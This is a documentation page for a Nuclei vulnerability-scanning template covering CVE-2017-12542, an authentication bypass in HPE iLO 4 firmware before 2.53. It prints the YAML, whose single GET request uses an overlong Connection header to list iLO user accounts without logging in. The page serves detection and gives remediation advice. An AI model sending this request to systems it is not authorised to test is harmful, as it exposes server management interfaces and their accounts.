Skip to content
Nuclei Templates

HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass

ID: CVE-2017-12542

Severity: critical

Author: pikpikcu

Tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp

Description

Section titled “Description”

HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2017-12542


info:
  name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
  author: pikpikcu
  severity: critical
  description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44005
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
    - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
    - https://www.exploit-db.com/exploits/44005/
    - http://www.securitytracker.com/id/1039222
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2017-12542
    epss-score: 0.97224
    epss-percentile: 0.99822
    cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hp
    product: integrated_lights-out_4_firmware
  tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp


http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/v1/AccountService/Accounts"


    headers:
      Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "iLO User"


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e2643132161ff3cba0e6480500c49668c795fc584277034ef0e5111c970f5a720221008184540dfb4efec7d973c173c7ff8b0d5d314e6a3e8c366feae26baa2b5d4c00:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-12542.yaml"

View on Github